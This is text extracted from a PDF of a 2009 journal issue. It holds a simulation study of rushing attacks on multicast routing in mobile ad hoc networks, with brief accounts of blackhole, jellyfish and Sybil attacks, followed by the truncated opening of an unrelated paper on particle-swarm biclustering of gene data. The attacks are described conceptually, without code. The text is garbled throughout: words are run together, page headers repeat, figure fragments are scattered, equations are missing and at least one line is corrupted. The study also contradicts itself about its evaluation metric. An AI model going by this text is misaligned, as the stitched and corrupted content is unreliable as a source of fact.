This paper is based on Rushing attack. In Rushing attack,
the attacker exploits the duplicate suppression mechanismby quickly forwarding route discovery packets in order togain access to the forwarding group and this will affect theAverage Attack Success Rate.
In this paper, the goal is to measure the impact of Rushing attack and their node positions which affect theperformance metrics of Average Attack Success Rate withrespect to three scenarios: near sender, near receiver and
anywhere within the network. The performance of theAttack Success Rate with respect to above three scenarios is
also compared.
Index Terms — Multicast, Rushing attack, MANETs,Security, Multicast, attack strategies, Security threats,Attacks on Multicast.
I. INTRODUCTION
A mobile ad hoc network is a self-organizing system of
mobile nodes that communicate with each other viawireless links with no infrastructure or centralizedadministration such as base stations or access points.Nodes in MANET operate both as hosts as well as routers
to forward packets for each other in a multi-hop fashion.
MANETSs are suitable for applications in which noinfrastructure exists such as military battlefield,
emergency rescue, vehicular communications and mining
In these applications, communication and collaboration
among a given group of nodes are necessary. Instead of using multiple unicast transmissions, it is advantageous to
use multicast in order to save network bandwidth andresources, since a single message can be delivered tomultiple receivers simultaneously. Existing multicastrouting protocols in MANETs can be classified into twocategories: tree based and mesh-based. In a multicast
routing tree, there is usually only one single path betweena sender and a receiver, while in a routing mesh, theremay be multiple paths between each sender receiver pair.Routing meshes are thus suitable than routing trees for
systems with frequently changing topology such asMANETs due to availability of multiple paths between asource and a destination. Example tree-based multicast
routing protocols are MAODV, AMRIS, BEMRP, and
ADMR. Typically mesh-based multicast routingprotocols are ODMRP, FGMP, CAMP , DCMP , and
NSMP [2].
Among all the research issues, security is an essential
requirement in MANET environments. Compared towired networks, MANETs are more vulnerable tosecurity attacks due to lack of trusted centralizedauthority, lack of trust relationships between mobile
nodes, easy eavesdropping because of shared wirelessmedium, dynamic network topology, low bandwidth, andbattery and memory constraints of mobile devices. The
security issue of MANETs in group communications is
even more challenging because of the involvement of multiple senders and multiple receivers. Although several
types of security attacks in MANETs have been studiedin the literature, the focus of earlier research is on unicast(point to point) applications. The impacts of securityattacks on multicast in MANETs have not yet been
explored [3].
In this paper, we present a simulation-based study of the effects of Rushing attack on multicast in MANETs.We consider the most common types of attacks, namelyrushing attack, blackhole attack, neighbor attack and jellyfish attack.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 190/215
A. Goal
The goal of this paper is to impact of rushing attack onmesh-based multicast in MANETs. The rushing attack ,
that acts as an effective denial-of-service attack against
all currently proposed on-demand ad hoc network routingprotocols, including protocols that were designed to be
secure. [2]
In this work, to simulate three scenarios: The attacker
node is place at near sender, the attacker node is place atnear receiver. The attacker node is place anywhere withinthe MANETs. Based on above scenarios, to simulate howthe Rushing attack affects the network performance.
B. Reading Roadmap
This paper starts with this section, which gives a brief
introduction, and goal of this paper. Section 2 describespreliminaries for multicast attacks in MANETs. TheImproved model scheme Impact of Rushing Attack onMulticast in Mobile Ad hoc Networks (IRAMA) is
presented in Section 3. In Section 4, we discuss theexperimental results and discussion. Finally, conclusionsare given in Section 5.
II. MULTICAST AND ITS ATTACKS IN MOBILE AD
HOC NETWORK
A. Introduction
A mobile ad hoc network (MANETs) is a self-organizing system of mobile nodes that communicate
with each other via wireless links with no fixedinfrastructure or centralized administration such as basestation or access points. Nodes in a MANETs operateboth as host as well as routers to forward packets for each
other in a multi-hop fashion. For many applications inwireless networks, multicasting is an important andfrequent communication service. By multicasting, since a
single message can be delivered to multiple receiverssimultaneously. It greatly reduces the transmission costwhen sending the same packet to multiple recipients [4,
5].
Multicast is communication between a single senderand multiple receivers on a network. Otherwise ittransmits a single message to a select group of recipients.Multicast is used, for example, in streaming video, in
which many megabytes of data are sent over the network.Single packets copied by the network and sent to aspecific subset of network addresses. These addresses are
specified in the Destination Address. Protocol to allowpoint to multipoint efficient distribution of packets,frequently used in access grid applications. It greatlyreduces the transmission cost when sending the same
packet to multiple recipients. The option to multicast wasmade possible by digital technology to allow each digitalbroadcast station to split its bit stream into 2, 3, 4 or moreindividual channels of programming and/or data services.
Instead of using multiple unicast transmissions, it isadvantageous to use multicast in order to save bandwidthand resources. Since a single message can be delivered to
multiple receivers simultaneously. Multicast data maystill be delivered to the destination on alternative paths
even when the route breaks. It is typically used to refer toIP multicast which is often employed for streaming mediaand At the Data Link Layer, multicast describes one-to-many distribution such as Ethernet multicast addressing, Asynchronous Transfer Mode (ATM) point-to-multipoint
virtual circuits or Infiniband multicast. Teleconferencingand videoconferencing also use multicasting, but require
more robust protocols and networks. Standards are beingdeveloped to support multicasting over a TCP/IP network such as the Internet. These standards, IP Multicast andMbone, will allow users to easily join multicast groups.
[6]
B. Attack against ad hoc network
While a wireless network is more versatile than awired one, it is also more vulnerable to attacks. This is
due to the very nature of radio transmissions, which aremade on the air. On a wired network, an intruder wouldneed to break into a machine of the network or tophysically wiretap a cable. On a wireless network, an
adversary is able to eavesdrop on all messages within theemission area, by operating in promiscuous mode andusing a packet sniffer (and possibly a directional
antenna). Furthermore, due to the limitations of the
medium, communications can easily be perturbed; theintruder can perform this attack by keeping the mediumbusy sending its own messages, or just by jamming
communications with noise. [1]
Security has become a primary concern to provideprotected communication between mobile nodes in ahostile environment. Unlike wireline networks, theunique characteristics of mobile ad hoc networks pose a
number of non-trivial challenges to the security design.Providing security support for mobile ad-hoc networks ischallenging for several reasons: (a) wireless networks are
susceptible to attacks ranging from passiveeavesdropping to active interfering, occasional break-insby adversaries (b) mobile users demand ―anywhere,anytime‖ services; (c) a scalable solution is needed for a
large-scale mobile network (d) Dynamic topology (e)infrastructure less (f) Peer – to-peer network (g) Lack of centralized authority [17].
C Attacks on Multicast
Multicast conserves network bandwidth by sending asingle stream of data to multiple receivers. Packets are
duplicated only at branch points. The security issue of MANETs in group communications is even more
challenging because of involvement of multiple sendersand multiple receivers. Some different types of multicastattacks are Rushing attack, Balckhole attack, Neighbor
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 191/215
D. Rushing Attack
A rushing attacker exploits this duplicate suppression
mechanism by quickly forwarding route discoverypackets in order to gain access to the forwarding group.
[8]
Figure 1 Rushing Attack
Goal: to invade into routing paths
Target: multicast routing protocols that use aduplicate suppression mechanism in order to
reduce routing overheads.
Method: quickly forwards route discovery
(control) packets by skipping processing orrouting steps. Rushing attack otherwise, falselysending malicious control messages and thenforwards the packet fastly than clear node
reachable.
E. BlackHole Attack
An attacker can drop received routing messages,instead of relaying them as the protocol requires, in order
reducing the quantity of routing information available tothe other nodes.
This is called black hole attack , and is a ―passive‖ and
a simple way to perform a Denial of Service. The attack can be done selectively (drop routing packets for aspecified destination, a packet every n packets, a packet
every t seconds, or a randomly selected portion of thepackets) or in bulk (drop all packets), and may have theeffect of making the destination node unreachable or
downgrade communications in the network.
Message Tampering
An attacker can also modify the messages originatingfrom other nodes before relaying them, if a mechanism
for message integrity (i.e. a digest of the payload) is notutilized.
A packet drop attack or black hole attack is a type of
denial-of-service attack accomplished by droppingpackets. Black holes refer to places in the network whereincoming traffic is silently discarded (or "dropped"),without informing the source that the data did not reachits intended recipients [8 9]
Figure 2 (a). Black Hole Attack (Drop all packets)
Goal: to damage the packet delivery ratio
Target: all multicast protocols
Method: an attacker
o First invades into forwarding group (e.g., byusing rushing attack),
Then drops some or all data packets instead of forwarding them
Figure 2(b) Black Hole attack (small amt of data onlydrop)
Black Hole attacks effects the packet delivery and to
reduce the routing information available to the othernodes
Causes:
It down grade the communication
Effects of making the destination nodereachable
F. Neighbor Attack
Upon receiving a packet, an intermediate node recordsits Id in the packet before forwarding the packet to thenext node. An attacker, however, simply forwards the
packet without recording its Id in the packet to make twonodes that are not within the communication range of each other believe that they are neighbors (i.e., one-hop
away from each other ) resulting in a disrupted route
Node
Attacker node
(Black Hole)
Packet sentInitiator
Destination
Packet drop
Some amountof data sent
Forward
Initiator & destination
Attacker node (rushing)
Packet sent
Initiator
Destination
Packet sent
Packet drop & end connection
Node
Attacker
node
Packet
sent
Initiator
Destination
Packet drop &
end connection
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 192/215
G. Jelly Fish Attack
A jellyfish attacker first needs to intrude into the
multicast forwarding group. It then delays data packetsunnecessarily for some amount of time before forwarding
them. This results in significantly high end-to-end delayand thus degrades the performance of real applications.
Causes:
Increase end – end delay.
H. Sybil Attack
Sybil attack manifests itself by allowing themalicious parties to compromise the network bygenerating and controlling large numbers of shadow
identities. The fact is that each radio represents a single
individual. However the broadcast nature of radio allowsa single node to pretend to be many nodes simultaneously
by using many different addresses while transmitting.The off-shoot of this Sybil attack is analyzed usingPacket Delivery Ratio (PDR) as the performance metric.Theoretical based graphs are simulated to study theinfluence of Sybil attack in PDR [18].
Malicious user obtaining multiple fake identifies andpretends to be multiple distinct node in the systemmalicious node control the decision of the system [8].The Sybil attack can be categorized into sub categories:
presentation of multiple identities simultaneously andpresentation of multiple identities exclusively.
The concept of the identifiers exists at different levelsand because an identifier only guarantees the uniquenessat the intended level only. Sybil attack can be perpetrated
from network layer and application layer where therespective identifiers are IP address and Node ID. Sybilattack can be manifested either by creating new identities
or duplicating other identities by disabling them afterlaunching a DoS attack. This mechanism can be either alocalized or globalized one depending on the severity of the attack felt by neighboring nodes. Sybil attack can
defeat the objectives of distributed environment like fairresource allocation, voting, routing mechanism,
distributed storage, misbehavior detection etc.
III. IMPROVED MODEL (IMPACT OF RUSHING ATTACK ON
MULTICAST IN MOBILE AD HOC NETWORK
A. Related Work
In this related work to measure a simulation-basedstudy of the effects of Rushing attacks on multicast inMANETs. A Rushing attacker first needs to invade into
the multicast forwarding group in order to capture datapackets of the multisession. If then they quickly forward
the data packets to the next node on the routing path. Thistype of attack often results in very low Average Attack Success Rate [15].
B. Rushing Attack and its Impacts in Ad hoc Networks
Multicast is communication between a single sender
and multiple receivers on a network. Otherwise ittransmits a single message to a select group of recipients.
On a wireless network, an adversary is able to eavesdropon all messages within the emission area, by operating inpromiscuous mode and using a packet sniffer (andpossibly a directional antenna). Furthermore, due to thelimitations of the medium, communications can easily be
perturbed; MANETS are more vulnerable to attacks thanwired networks due to open medium, dynamically
changing network topology, cooperative algorithms, lack of centralized monitoring and lack of clear line of defense[10].
Typically, multicast on-demand routing protocols statethat nodes must forward only the first received Route
Request from each route discovery; all further receivedRoute requests are ignored. This is done in order to
reduce cluttering. The attack consists, for the adversary,in quickly forwarding its Route Request messages when aroute discovery is initiated. If the Route Requests thatfirst reach the target’s neighbors are those of the attacker,then any discovered route includes the attacker. The
rushing attack , that acts as an effective denial-of-service
attack against all currently proposed on-demand ad hocnetwork routing protocols, including protocols that weredesigned to be secure. [14] In this work, to simulate three
scenarios:
The attacker node is place at near sender
The attacker node is place at near receiver.
The attacker node is place anywhere within the
network.
Based on above scenarios, to simulate how the Rushing
attack affects the network performance.
C. Rushing Attack Formation
Figure 3 Rushing attack Formation
destinationR
Initiator
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 193/215
Algorithm for Rushing Attack Formation
Step1: Set of N number of nodes are created.Step2: Create a connection between nodes.Step3: Rushing node invaded into the forward multicast
group.Step4: Send the packet to the particular groupsStep5: At mean time attacker node tap all the packets.
Step6: The packets in the attacker node are then quicklyforwarded to the next upcoming node.
Step7: The data packets from the legitimate node reachesthe destination late and so it is dropped as
duplicate packet.Step8: Rushing node in the multicast grouping, affect the
Avg Attack Success Rate.
C Rushing Attack Based on Three scenarios
i. Rushing attack at near sender
Figure 4. Rushing Node at near Sender
In this figure 4 node S sends the packet to thedestination node R. The attacker node A is placed at near
sender. The data packets from the sender are forwarded toboth the node A and C at the same time. The attackernodes quickly forward the data packet to node E than thenode C. The attacker node forwards the packet to node E
then to G and B node. Finally Receiver R receives thedata packets that are forwarded by attacker node. Theperformance of Attack Success Rate with respect to this
scenario is calculated.
Algorithm for near sender
Step 1: Create a set of n number of nodesStep2: Create a connection between the nodes
Step3: Invade the attacker node at near senderStep4: Sender sends the packet through specified path.Step5: Other forward nodes, forward the packet to the
next node.Step6: The attacker node taps all the packets.Step7: The attacker node quickly forwards the packets to
the next node that are closest to the receiver
Step8: The data packets are then finally reaches the
destination node.
ii. Rushing attack at near receiver
Figure 5 Rushing Node at near Receiving
In this figure 5 node S sends the packet to the
destination node R. The attacker node A is placed at nearreceiver. The sender node forwards the data packets to
both the node B and C at the same time. The data packetcan pass through either B, E and G nodes or C, F and Gnodes. When the data packet reaches the attacker node A,it quickly forwards the data packet to node R. Theperformance of Attack Success Rate with respect to thisscenario is calculated.
Algorithm for near receiver
Step 1: Create a set of n number of nodes.Step2: Create a connection between the nodes.Step3: Invade the attacker node at near receiver.
Step4: Sender send the packets through specified path.Step5: Other forward nodes, forward the packet to the
next node.Step 6: Attacker node tap all the packets through the
specified path.Step7: The attacker node then quickly forwards the
packets.Step8: Intermediate node forwards the packets to the
destination node .
iii. Rushing attack at anywhere within the network:
In this figure 5 node S sends the packet to the
destination node R. The attacker node A is placedanywhere within the network. The data packet from thesender is forwarded to the nodes B and C. The datapacket is then forwarded through the nodes B and E. Butthe data packet passed through the node C and then toattacker node A which quickly forwards the data packetto the node G than from the node E. The data packet is
then finally reaches the receiver node R through node F.The performance of Attack Success Rate with respect tothis scenario is calculated.
Algorithm for anywhere within network
Step 1: Create a set of n number of nodes
Step2: Create a connection between the nodesStep3: Invade the attacker node at anywhere within the
network
S
C
A
F
E
G B R
S
C
A
F
E
G
B
R
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 194/215
Step4: Sender send the packet through specified path.Step5: Other forward nodes, forward the packet to the
next node.
Step6: The attacker nodes tap the entire packet.Step7: The attacker node then quickly forwards the
packets.Step8: The intermediate node forwards packet to the next
node until it reaches the destination.
Figure 6 Rushing Node at anywhere within the network.
IV. EXPERIMENTAL RESULTS AND DISCUSSION
Introduction
The algorithm is evaluated against known network metrics and impact of rushing attack on multicast in
mobile ad hoc network scheme specific network metrics.Comparison is done with rushing attacker node place atnear sender, near receiver and uniformly distribution.
Metrics for Evaluation: The known network metrics to beused for performance evaluation is packet delivery ratio.
Simulation Results
We run several simulations under Linux, using thenetwork simulator NS2 version ns-allinone-2.26. Thesimulation environment is composed of:
area: 500*500 meters.
number of nodes 50 - 100.
simulation duration: 1000s.
physical/Mac layer: IEEE 802.11 at 2Mbps, 250
meters transmission range.mobility model: random waypoint model with
no pause time, and mode
movement speed 0m/s, 1m/s and 10m/s.
Using routing protocols are AODV and
MAODV under NS2.26.
A. Rushing attack at near sender (One sender and 5
receivers)
When the rushing attack happens at near sender in adhoc network, the attack success rate is average because ithas to search only the intermediate node. If there is no
rushing attack in the network then the average attack success rate will be least.
10
20
30
40
50
60
70
80
90
100
0 5 10 15 20 25 30 35 40 A v e r e a g e A t t a d c k S
u c c e s s R a t e
( % )
Process Delay (ms)
With Rushing attack
Without Rushing attack
Figure 7 Rushing attack at near sender
B. Rushing Attack at Near Receiver
10
20
30
40
50
60
70
80
90
100
0 5 10 15 20 25 30 35 40 A v e r e
a g e A t t a d c k S u c c e s s R a t e
( % )
Process Delay (ms)
With Rushing Attack Without Rushing attack
Figure 8 Rushing attack at near receiver
The figure 8 shows that the Attack Success Rate goes
high, because of Rushing node is placed near receiver,because most of the forward node will contain all thepackets. Since the attacker node is near to the receiver, it
can gets the packet when the packet reaches the forwardnode near the receiver. Therefore, the receiver node getthe packet quickly from the near attacker node and the
impact of attack is highly harmful.
C. Rushing Attack at Anywhere
The figure 9 shows that the Attack Success Rate goesleast rate, because of Rushing node is placed anywhere.The attacker node is not placed at near sender or near
receiver. The rushing node is placed anywhere (i.e.
forward node in group). The forwarded node (Rushingattacker) taps the packet and quickly forwards the
packets to the next node. Therefore, the chance of tti th k t f th tt k d d d th
S
C A
F
E
G
B
R
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 195/215
upcoming nodes and so the impact of attack is leastwhen its compare to near receiver’s Attack SuccessRate, is slightly higher than the near sender in which the
Attack Success Rate is low
10
20
30
40
50
60
70
80
90
100
0 5 10 15 20 25 30 35 40 A v e r e a g e A t t a d c k S u c c e s s R a t e
( % )
Process Delay (ms)
With rushing attack Without rushing attack
Figure 9 Rushing Attack at anywhere
V. CONCLUSION AND FUTURE DIRECTIONS
A. Conclusion
The Rushing attacks are more likely to succeed in amulticast session where the number of multicast sendersis small and/or the number of multicast receivers is large.
The goal of the project is to draw the graph based on therushing attack position in the network. With respect tothe attack positions, the best position to launch rushingattacks is at the near receiver, have the highest success
rates. The rushing attack near sender have the lowsuccess rate and final attack position is likely to takeplace anywhere in the network, have the least successrate.
B. Future Directions
In this project deals with one sender and multiplereceivers in multicast ad hoc network. Apart fromthis there are chances to enhance it to havemultiple senders and multiple receivers inmulticast ad hoc network.
In this project , it is assumed to have only oneattacker node in the network for future it can be
extended by adding more attacker nodes in thenetwork.
REFERENCES
[1] Ping Yi, Zhoulin Dai, Shiyong Zhang, Yiping Zhong,―A New Routing Attack in Mobile Ad Hoc Networks
International Journal of Information Technology Vol.
11 No. 2, pages 83 – 94.
[2] Bruschi, D. and Rosti, E., ―Secure Multicast in
Wireless Networks of Mobile Hosts: Protocols and
Issues‖, Mobile Networks and Applications, Volume
7, 2002, pp 503 - 511.
[3] Moyer, M.J., Rao, J.R. and Rohatgi, P., ―A Survey of Security Issues in Multicast Communication‖,IEEE
Network, Nov.-Dec. 1999, pp. 12 – 23. [4] Dr. Jiejun Kong, ― GVG −RP : A Net-centric
Negligibility-based Security Model for Self-organizing Networks‖.
[5] S.Corson, J.Macker, ―Mobile ad hoc
Networking(MANET):Routing Protocol Performance
Issues and Evaluation Considerations, RFC 2501,January 1999.
[6] C. Schuba, I. Krsul, M. Kuhn, E. Spafford, A.Sundaram, D. Zamboni, Analysis of a Denial of Service Attack on TCP, Proceedings of the 1997
IEEE Symposium on Security and Privacy.[7] Haining Wang, Danlu Zhang, and Kang G. Shin,
Detecting SYN Flooding Attacks, IEEE
INFOCOM'2002, New York City, 2002[8] Jiejun Kong, Xiaoyan Hong, Mario Gerla, “ A new
set of passive routing attacks in mobile ad hoc
networks ―,This work is funded by MINUTEMAN
project and related STTR project of Office of NavalResearch Pages 1- 6.
[9] Jiejun Kong, Xiaoyan Hong, Mario Gerla, ― Modeling
Ad-hoc Rushing Attack in a Negligibility-basedSecurity Framework‖, September 29, 2006, LosAngeles, California, USA.
[10] Hoang Lan Nguyen , Uyen Trang Nguyen, ―A study
of different types of attacks on multicast in mobile adhoc networks‖ Ad Hoc Networks 6 (2008) pages 32– 46.
[11] S.J. Lee, W. Su, M. Gerla, ― On-Demand MulticastRouting Protocol in Multihop Wireless Mobile Networks ―, ACM/ Kluwer Mobile Networks and
Applications 7 (6) (2002) 441 – 453.[12] Imad Aad, Jean-Pierre Hubaux , Edward W.
Knightly, ― Impact of Denial of Service Attacks onAd Hoc Networks ―
[13] Y.-C. Hu, A. Perrig, and D. B. Johnson, ―Ariadne: A
secure ondemand routing protocol for ad hocnetworks,‖ in Proceedings MobiCom 2002, September
2002.[14] M. Zapata and N. Asokan, ―Secur ing ad hoc routing
protocols,‖ in Proceedings of the ACM Workshop on
Wireless Security (WiSe), 2002.[15] Y.-C. Hu, A. Perrig, and D. B. Johnson, ―Efficient
security mechanisms for routing protocols,‖ in Network
and Distributed System Security Symposium, NDSS,2003.
[16] YihChun Hu, Adrian Perrig, David B. Johnson, ―Rushing Attacks and Defense in Wireless Ad Hoc
Network Routing Protocols ― , WiSe 2003, September
19, 2003, San Diego California, USA Copyright 2003ACM.
[17] Yang, H., Luo, H., Ye, F., Lu, S., and Zhang, L.,―Security in Mobile Ad Hoc Networks: Challenges andSolutions‖, IEEE Wireless Communications, Volume
11, Issue 1, February 2004, pp. 38 – 47.[18] Besemann, C., Kawamura, S. and Rizzo, F.,
―Intrusion Detection System in Wireless Ad-Hoc
Networks: Sybil Attack Detection and Others‖.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 196/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
A Hybrid Multi-Objective Particle Swarm Optimization
Method to Discover Biclusters in Microarray Data
Mohsen lashkargir *
Department of Computer Engineering
Islamic Azad University, najafabad branch
Isfahan, 81746, Iran
e-mail: mlashkargir@gmail.com
S. Amirhassan Monadjemi
Department of Computer Engineering
Faculty of Engineering
University of Isfahan
Isfahan, 81746, Iran
Ahmad Baraani Dastjerdi
Department of Computer Engineering
Faculty of Engineering
University of Isfahan
Isfahan, 81746, Iran
Abstract — In recent years, with the development of
microarray technique, discovery of useful knowledge from
microarray data has become very important. Biclustering is a
very useful data mining technique for discovering genes which
have similar behavior. In microarray data, several objectives
have to be optimized simultaneously and often these
objectives are in conflict with each other. A Multi-Objective
model is capable of solving such problems. Our method
proposes a Hybrid algorithm which is based on the Multi-
Objective Particle Swarm Optimization for discovering
biclusters in gene expression data. In our method, we willconsider a low level of overlapping amongst the biclusters and
try to cover all elements of the gene expression matrix.
Experimental results in the bench mark database show a
significant improvement in both overlap among biclusters and
coverage of elements in the gene expression matrix.
Keywords-component; biclustering; Multi-Objective ParticleSwarm; gene expersion data;
I. INTRODUCTION
The microarray technique allows measurement of mRNAlevels simultaneously for thousands of genes. It is now possibleto monitor the expression of thousands of genes in parallel over
many experimental conditions (e.g., different patients, tissuetypes, and growth environments), all within a singleexperiment. Microarray data constructs a data matrix in whichrows represent genes and columns show condition. Each entryin the matrix shows the expression level of specific gene (g i )under particular condition (ci). Through analysis of geneexpression data the genes are found that represent similarbehavior among a subset of condition. In [14] used clusteringfor analyses of gene expression data but genes don't showsimilar behavior in all conditions, while genes show similarbehavior in subset of conditions. However the genes are notnecessarily related in all conditions, in other words, there aregenes that can be relevant in subset of condition [3]. In fact,
both of rows and columns (genes and conditions) are clusteredand they refer to biclustering (simultaneously clustering of bothrows and columns)[2].
The biclustering problem is even more difficult thanclustering, as we tried to find clusters using two dimensions,instance of one.
The first biclustering useful algorithm was proposed byCheng and Church [1] in 2000. They introduced the residue of an element in the bicluster and the mean squared residue of submatrix for quality measurement of biclusters. This
introduced method is a good measurement tool for biclusteringand we use this measurement. Getz et al [15] presented thecouple two-way clustering. It uses hierarchical clusteringapplied separately to each dimension and they define theprocess to combine both results. The time complexity of thismethod is Exponential. Yang improved Cheng and Churchapproach to find K possibly overlapping biclusterssimultaneously [3].It is also robust against missing valueswhich are handled by taking into account the bicluster volume(number of non-missing elements) when computing the score.
The biclustering problem is proven to be NP hard [1]. Thishigh complexity motivated the researcher to use stochasticapproach to find biclusters. Federico and Aguilar proposed a
Biclustering algorithm with Evolutionary computation [4]. Inbiclustering of gene expression data, the goal is to findbicluster of maximum size with mean squared residue lower
than a givenδ, which are relatively high row variance. In [4],the fitness function is made by the sum weighted of thisobjectives function. Since in biclustering problem someobjectives exist, that are in conflict with each other, using multiobject methods is very suitable to solve that. In this work weaddress a biclustering problem with Multi-Objective problemthat hybrid with Cheng and Church algorithm.
This paper is organized as follows: in section 2, thedefinitions related to biclustering are presented. Anintroduction to PSO and Binary PSO is given in section 3. The
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 197/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
description of the algorithm is illustrated in section 4.Experimental results and comparative analysis are discussed insection 5. The last section is the conclusion.
II. BICLUSTRING
A bicluster is defined on a gene expression matrix. LetG={g1 , … , gN} be a set of genes and C={c1, … ,cM} be a setof conditions .The gene expression matrix is a matrix of realnumbers , with possible null values , where each entry eij corresponds to the logarithm of the relative abundance of themRNA of gen gi under a specific condition c j[4].A bicluster ingene expression data corresponds to the submatrix that genes inthat show similar behavior under a subset of conditions. Abicluster is showed by subset of genes and subset of conditions.The similar behavior between genes is measured by meansquared residue that was introduced by Cheng and Church.
Definition 1 : Let ( I,J ) be a bicluster ( I ⊆ G , J ⊆ C ) thenthe mean squared residue ( rIJ ) of a bicluster ( I,J ) is calculated
as below :
(1)
Where
(2)
(3)
(4)
The lower the mean squared residue, the stronger thecoherence exhibited by the bicluster and the quality of thebicluster. If a bicluster has a mean squared residue lower than a
given value δ , then we call the bicluster a δ–bicluster. Inaddition to the mean squared residue, the row variance is usedto be relatively large to reject trivial bicluster.
Definition 2: Let (I,J) be a biclusters. The row variance of (I,J) is defined as
(5)
Biclusters characterized by high values of row variancecontains genes that present large chances in their expressionvalues under different conditions.
III. MULTI-OBJECTIVE PARTICLE SWARM
Particle Swarm Optimization (PSO) is a population basedon stochastic optimization technique developed by Kennedyand Eberhat in 1995 [5].This method finds an optimal solution
by simulating social behavior of bird flocking. The populationof the potential solution is called swarm and each individualsolution within the swarm is called a particle. Particles in PSOfly in the search domain guided by their individual experienceand the experience of the swarm. Each particle knows its best
value so far (pbest) and it's x,y position. This information is ananalogy of the personal experience of each particle. More evereach agent knows the best value so far into group (gbest)among pbests. This information is an analog of the knowledgeof how the other particles around them have performed.
Each particle tries to modify its position using thisinformation : the current positions (x1,x2,…,xd),the currentvelocities (V1,V2,…,Vd),the distance between the currentposition and pbest and the distance between the currentposition and gbest. The velocity is a component in the directionof previous motion (inertia). The movement of the particletowards the optimum solution is governed by updating itsposition and velocity attributes. The velocity and position
update equation are given as [7].
(6) where vi
k is velocity of agent i at iteration k, w is weightingfunction, c j is weighting coefficients, rand is random numberbetween 0 and 1, si
k is current position of agent i at iteration k,pbesti is pbest of agent i, and gbest is gbest of the group.
A. Binary Particle Swarm Optimization
The binary Particle Swarm Optimization (BinPSO)algorithm was also introduced by Kennedy and Eberhart toallow the PSO algorithm to operate in binary problem spaces[11]. It uses the concept of velocity as a probability that a bit
(position) takes on one or zero. In BinPSO, updating a velocityremains the same as the velocity in basic PSO; however, theupdating position is redefined by the following rule [11]:
(7)
With r3~U (0,1) and S() is a sigmoid function fortransforming the velocity to the probability constrained to theinterval [0.0, 1.0] as follows
(8) Where S(v)∈(0,1) , S(0)=0.5, and r3 is a quasi random
number selected from a uniform distribution in [0.0, 1.0]. For avelocity of 0, the sigmoid function returns a probability of 0.5,implying that there is a 50% chance for the bit to flip.
B. particle swarm and Multi-Objective problems
The success of the Particle Swarm Optimization (PSO)algorithm as a single objective optimizer has motivatedresearchers to extend the use of this bio-inspired technique to
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 198/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
Multi-Objective problems [6].In problems with more than oneconflicting objective, there exist no single optimum solutionrather there exists a set of solutions which are all optimalinvolving trade-offs between conflicting objective (paretooptimal set).
Definition 3: if there are M objective functions, a solution xis said to dominate another solution y if the solution x is noworse than y in all the M objective functions and the solution xis strictly better than y in at least one of the M objectivefunctions. Otherwise the two solutions are non-dominating toeach other. This concept is shown in Fig1.
Definition 4: If Z is subset of feasible solutions, a solution
x∈Z is said to non-dominate with respect to Z if there does not
exist another solution y∈Z that y dominates z (Red point inFig.1).
Definition 5: If F is a set of feasible solutions, a solution
x∈F is said to be pareto-optimal, if x is non-dominate with
respect to F (Red point in Fig1 if we suppose all feasiblesolutions are shown in Fig.1).
In Multi-Objective optimization problem, we determine thepareto optimal set from the set of feasible solutions. In thisproblem, we must consider the diversity among solutions inpareto set. For maintaining diversity in the pareto optimal set,we use the crowding distance that is provided by deb [12]. Inthe Multi-Objective PSO, the nondomiated solutions are foundstored in archive. After each motion in swarm the archive isupdated according to bellow:
If an element in archive is dominated by a new solution, thecorresponding element in archive is removed. If new solution isnot dominated by any element in archive, new solution is added
to archive. If archive is full, crowding, distance betweenelements in archive are computed according to [12] and thenone element in archive is selected to remove according todiversity. We use roulette wheel to do this selection.
In (6) each particle need to gbest for motioning in searchspace. In Multi-Objective PSO we have a set of gbests thatcalled archive. There exists many different ways to selectgbest. More detail is described in [6]. In our method, gbest isselected from archives based on crowding distance to maintaindiversity. If an element in archive has more diversity, it hasmore chance to be selected as gbest. We use roulette wheelselection to do it. So the particles motion to pareto optimal setand diversity is maintained with roulette wheel selection for
selecting gbest.IV. OUR HYBRID MULTI-OBJECTIVE PSO METHOD
Our goal is to find biclusters (I, J) (I is subset of genes, J issubset of conditions) of maximum size, with mean squared
residue lower than a given δ , with a relatively high rowvariance, and with a low level of overlapping among biclusters.
Figure 1. Example of dominate and non-dominate cocepts(f1 and f2 must be
minimaze).Red points dominate blue points and yellow points.Red points are
non-diminated each other.
The size of bicluster is defined as |I|*|J| if we use thisdefinition as an objective since the number of rows is higher
than the number of columns , columns have less effect inobjective. So we separate rows and columns and consider twoobjective functions one for rows and one for columns.
Problem is formulated as below:
Find ( I,J )
That minimize
(9)
(10)
(11)
(12)
Subject to
(13)
